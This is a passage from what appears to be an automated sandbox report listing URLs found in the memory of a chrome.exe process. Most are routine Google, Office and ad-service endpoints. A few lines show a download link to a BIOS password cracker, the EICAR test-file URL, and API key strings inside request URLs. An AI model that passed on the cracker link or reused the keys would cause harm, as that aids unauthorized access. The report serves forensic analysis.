                          Source: chrome.exe, 00000002.00000003.12144293546.00002D2403F1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12185156115.00002D2000654000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12144927817.00002D2403F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12104112913.00002D2000650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12144506463.00002D2403F24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12145351599.00002D2403F74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12145476171.00002D2403F88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12102819245.00002D2000534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12144727824.00002D2403F48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12103930290.00002D2000650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12145187690.00002D2403F60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12102884594.00002D200053C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/
                          Source: chrome.exe, 00000002.00000003.12147098378.00002D20006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12143230023.00002D2403AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
                          Source: chrome.exe, 00000002.00000003.12102819245.00002D2000534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12102884594.00002D200053C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/p_4x
                          Source: chrome.exe, 00000002.00000003.12144293546.00002D2403F1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12185156115.00002D2000654000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12144927817.00002D2403F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12104112913.00002D2000650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12144506463.00002D2403F24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12145351599.00002D2403F74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12145476171.00002D2403F88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12102819245.00002D2000534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12144727824.00002D2403F48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12103930290.00002D2000650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12145187690.00002D2403F60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12102884594.00002D200053C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
                          Source: chrome.exe, 00000002.00000003.12147098378.00002D20006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12143230023.00002D2403AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
                          Source: chrome.exe, 00000002.00000003.12144293546.00002D2403F1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12144927817.00002D2403F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12144506463.00002D2403F24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12145351599.00002D2403F74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12144727824.00002D2403F48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12145187690.00002D2403F60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/AttributionReportingCrossAppWeb
                          Source: chrome.exe, 00000002.00000002.12185156115.00002D2000654000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12104112913.00002D2000650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12103930290.00002D2000650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
                          Source: chrome.exe, 00000002.00000003.12102819245.00002D2000534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12102884594.00002D200053C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/p_4x
                          Source: chrome.exe, 00000002.00000003.12144293546.00002D2403F1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12144927817.00002D2403F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12144506463.00002D2403F24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12102513366.00002D2000514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12145351599.00002D2403F74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12145476171.00002D2403F88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12144727824.00002D2403F48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12145187690.00002D2403F60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12185330131.00002D2000698000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
                          Source: chrome.exe, 00000002.00000003.12147098378.00002D20006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12143230023.00002D2403AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
                          Source: chrome.exe, 00000002.00000003.12144293546.00002D2403F1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/KAnonymityServiceJoinServer
                          Source: chrome.exe, 00000002.00000002.12186331740.00002D2402220000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromemodelexecution-pa.googleapis.com/v1:Execute?key=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBg
                          Source: chrome.exe, 00000002.00000002.12186331740.00002D2402220000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromemodelquality-pa.googleapis.com/v1:LogAiData?key=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBg
                          Source: chrome.exe, 00000002.00000002.12188280827.00002D2402470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
                          Source: chrome.exe, 00000002.00000002.12188280827.00002D2402470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
                          Source: chrome.exe, 00000002.00000002.12188029688.00002D240243C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12108474072.00002D240243C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12119374185.00002D240243C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/
                          Source: chrome.exe, 00000002.00000002.12193143047.00002D2402C68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/category/extensions
                          Source: chrome.exe, 00000002.00000002.12193143047.00002D2402C68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/category/themes
                          Source: chrome.exe, 00000002.00000002.12188212582.00002D2402454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/
                          Source: chrome.exe, 00000002.00000003.12096141028.00007260000DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12096117675.00007260000D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
                          Source: chrome.exe, 00000002.00000002.12187510484.00002D2402368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
                          Source: chrome.exe, 00000002.00000002.12191342488.00002D2402A34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
                          Source: chrome.exe, 00000002.00000002.12191689804.00002D2402A98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
                          Source: chrome.exe, 00000002.00000002.12191689804.00002D2402A98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
                          Source: chrome.exe, 00000002.00000002.12192977530.00002D2402C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=128
                          Source: chrome.exe, 00000002.00000002.12192756587.00002D2402BC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://consent.trustarc.com/
                          Source: chrome.exe, 00000002.00000002.12194699221.00002D2402F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://consent.trustarc.com/get?name=crossdomain.html&domain=oracle.com
                          Source: chrome.exe, 00000002.00000002.12196734725.00002D240331C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cpx.to
                          Source: chrome.exe, 00000002.00000002.12196028536.00002D2403204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12116420730.00002D2402C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/593024
                          Source: chrome.exe, 00000002.00000002.12196028536.00002D2403204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12116420730.00002D2402C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/650547
                          Source: chrome.exe, 00000002.00000002.12196028536.00002D2403204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12116420730.00002D2402C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/655534
                          Source: chrome.exe, 00000002.00000002.12195822771.00002D2403198000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12186685247.00002D2402284000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196476185.00002D24032CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B9AB9339B
                          Source: chrome.exe, 00000002.00000002.12194909693.00002D2402FE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196334480.00002D240328E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE
                          Source: chrome.exe, 00000002.00000002.12194909693.00002D2402FE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXEtall.exe
                          Source: chrome.exe, 00000002.00000002.12198062457.00002D2403554000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12188460320.00002D2402524000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/
                          Source: chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/:
                          Source: chrome.exe, 00000002.00000002.12198062457.00002D2403554000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197687210.00002D24034B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12188280827.00002D2402470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
                          Source: chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/J
                          Source: chrome.exe, 00000002.00000003.12143230023.00002D2403AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
                          Source: chrome.exe, 00000002.00000002.12199855867.00002D2403964000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197881211.00002D240350C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
                          Source: chrome.exe, 00000002.00000002.12199855867.00002D2403964000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultult
                          Source: chrome.exe, 00000002.00000002.12194236207.00002D2402E7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12193772521.00002D2402DA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197881211.00002D240350C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
                          Source: chrome.exe, 00000002.00000002.12197881211.00002D240350C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actionsr
                          Source: chrome.exe, 00000002.00000002.12197881211.00002D240350C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
                          Source: chrome.exe, 00000002.00000002.12198062457.00002D2403554000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12188460320.00002D2402524000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/
                          Source: chrome.exe, 00000002.00000002.12187570577.00002D2402378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/:
                          Source: chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197881211.00002D240350C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
                          Source: chrome.exe, 00000002.00000002.12187570577.00002D2402378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/J
                          Source: chrome.exe, 00000002.00000002.12187570577.00002D2402378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12199855867.00002D2403964000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197881211.00002D240350C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
                          Source: chrome.exe, 00000002.00000002.12199855867.00002D2403964000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default0A
                          Source: chrome.exe, 00000002.00000002.12194236207.00002D2402E7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12193772521.00002D2402DA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197881211.00002D240350C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
                          Source: chrome.exe, 00000002.00000002.12198062457.00002D2403554000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197201532.00002D24033CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/
                          Source: chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/:
                          Source: chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197881211.00002D240350C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
                          Source: chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/J
                          Source: chrome.exe, 00000002.00000002.12199855867.00002D2403964000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197881211.00002D240350C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
                          Source: chrome.exe, 00000002.00000002.12194236207.00002D2402E7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12193772521.00002D2402DA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197881211.00002D240350C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
                          Source: chrome.exe, 00000002.00000002.12194634488.00002D2402F50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196213873.00002D2403264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196334480.00002D240328E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-GB&attribution_code=c291cm
                          Source: chrome.exe, 00000002.00000003.12121855837.00002D2403930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121572695.00002D24026F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121757415.00002D2402740000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
                          Source: chrome.exe, 00000002.00000002.12198062457.00002D2403554000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12186475572.00002D240225C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
                          Source: chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/:
                          Source: chrome.exe, 00000002.00000002.12198062457.00002D2403554000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12186475572.00002D240225C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12194768548.00002D2402FB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12198123543.00002D2403570000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2
                          Source: chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/J
                          Source: chrome.exe, 00000002.00000002.12199855867.00002D2403964000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196842993.00002D2403330000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12194909693.00002D2402FE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
                          Source: chrome.exe, 00000002.00000002.12199855867.00002D2403964000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_defaulttler
                          Source: chrome.exe, 00000002.00000002.12188972269.00002D24025B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/settings
                          Source: chrome.exe, 00000002.00000002.12192977530.00002D2402C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
                          Source: chrome.exe, 00000002.00000002.12192977530.00002D2402C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=searchTerms
                          Source: chrome.exe, 00000002.00000002.12194699221.00002D2402F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: chrome.exe, 00000002.00000002.12192977530.00002D2402C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: chrome.exe, 00000002.00000002.12192977530.00002D2402C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.ico
                          Source: chrome.exe, 00000002.00000002.12196734725.00002D240331C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ebis.ne.jp
                          Source: chrome.exe, 00000002.00000002.12189028227.00002D24025C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
                          Source: chrome.exe, 00000002.00000002.12187167502.00002D2402310000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12186742001.00002D2402290000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
                          Source: chrome.exe, 00000002.00000002.12195822771.00002D2403198000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12186685247.00002D2402284000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196334480.00002D240328E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sdlc-esd.oracle.com/ESD6/JSCDL/jdk/8u301-b09/d3c52aa6bfa54d3ca74e617f18309292/JavaSetup8u301
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure-oldnavy.gap.com/shopping-bag
                          Source: chrome.exe, 00000002.00000002.12196842993.00002D2403330000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12195250217.00002D2403068000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12198123543.00002D2403570000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196476185.00002D24032CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com.txt
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.newegg.com/shop/cart
                          Source: chrome.exe, 00000002.00000002.12195046159.00002D2403004000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12188280827.00002D2402470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
                          Source: chrome.exe, 00000002.00000003.12147909365.00002D24038D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12191554369.00002D2402A70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://servedby.flashtalking.com/container/13539;99030;10307;iframe/?ftXRef=&ftXValue=&ftXType=&ftX
                          Source: chrome.exe, 00000002.00000002.12200163204.00002D24039C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12193143047.00002D2402C68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.cm/?
                          Source: chrome.exe, 00000002.00000003.12142740466.00002D2403A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12142698855.00002D2403A70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12195303310.00002D2403088000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196171828.00002D2403258000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com
                          Source: chrome.exe, 00000002.00000002.12196842993.00002D2403330000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12189270703.00002D2402670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12195167249.00002D2403050000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12191479618.00002D2402A5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12190721731.00002D240298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12188159693.00002D2402448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/
                          Source: chrome.exe, 00000002.00000002.12196696307.00002D2403310000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196995817.00002D2403384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/?ms.officeurl=setup
                          Source: chrome.exe, 00000002.00000002.12196696307.00002D2403310000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196370294.00002D2403298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/EnterPin?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
                          Source: chrome.exe, 00000002.00000002.12188643734.00002D2402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/EnterPin?tid
                          Source: chrome.exe, 00000002.00000002.12196696307.00002D2403310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/Home/EligibileActModern?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
                          Source: chrome.exe, 00000002.00000002.12196696307.00002D2403310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
                          Source: chrome.exe, 00000002.00000002.12196624797.00002D24032FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/SignIn?ctid=34c190b7-c610-402a-b0d1-920cecdfcf12&redirectUri=https%3A%2F%2F
                          Source: chrome.exe, 00000002.00000002.12196624797.00002D24032FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196424496.00002D24032B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/SignIn?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8&redirectUri=https%3A%2F%2F
                          Source: chrome.exe, 00000002.00000002.12196734725.00002D240331C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/SignIn?ru=https%3A%2F%2Fsetup.office.com%2F%3Fms.officeurl%3Dsetup
                          Source: chrome.exe, 00000002.00000002.12196696307.00002D2403310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/home/ProvisionLoading?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
                          Source: chrome.exe, 00000002.00000002.12196842993.00002D2403330000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/signin-oidc
                          Source: chrome.exe, 00000002.00000003.12103309788.00002D20005B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12103422867.00002D20005CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12103236894.00002D20005AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com
